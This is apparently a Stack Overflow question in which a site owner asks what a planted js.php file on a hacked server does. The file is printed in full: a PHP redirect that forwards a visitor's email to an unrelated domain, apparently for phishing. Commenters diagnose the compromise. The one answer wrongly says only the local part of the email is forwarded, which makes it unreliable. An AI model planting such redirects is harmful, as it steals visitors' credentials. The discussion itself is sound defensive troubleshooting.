# what does this js.php file mean

Tags: php

After my site was flagged by google for a deceptive page and provided a sample url as `[my site]/js.php?email=nobody@mycraftmail.com`

I found the `js.php` file in my cpanel when i viewed it the code below is what the file contained.  I need help determining what this code does. `[other domain]` has nothing to do with my site or me.

```
<?
$login = $_GET["email"];
$url = explode("@",$login);
$parts = preg_split ("/[\@.]+/", $login);
$cust_email = $parts[0];
$$login = $_GET['$login'];
header("Location: http://[other domain]/inc/index.php?email=$login");
?>
```

Comment: why not run it with test data?

Comment: 1. This is not JavaScript, this is pure PHP. 2. It does a redirect forwarding people's credentials to a different page.

Comment: It redirects to that page. You need to sanitize your pages and remove the code that allows the hackers to (re)write files on your server

Comment: If this is *your site* and you didn't put that code there (and/or you don't know exoticaorchids.in), then chances are that your server is compromised and you need to wipe it clean, set up everything again from safe sources and improve the security mechanisms to avoid this in the future. **tl;dr** your server has been hacked and you need to consider it controlled by the attacker. Start from scratch.

Comment: Question belong at https://webmasters.stackexchange.com/ rather than here

Comment: Thank you everyone for the quick responses. Joachim, i am using a2hosting as my hosting provider and i have several websites that i maintain for clients. A2hosting could not find any issues. Are you saying that all of teh websites i have on a2 should be wiped?

Comment: @JJEnterpriseConsultingInc: I'm saying that if you didn't put that file there and you don't know who did, then you can't know if they can *still* manipulate files on your servers. Maybe it's as simple as someone having found out your password or maybe someone exploited a security vulnerability in A2s underlying system. It's impossible for me to tell at this point and **way** outside the scope of a single SO question.

Comment: I do not know php or js, my apologies..and I really appreciate the help.

Answer (score 0):

It splits the email in half at the `@`, takes the first part, (ie ditching for example `@gmail.com`) and then redirects elsewhere, with the first part of the email as a query parameter.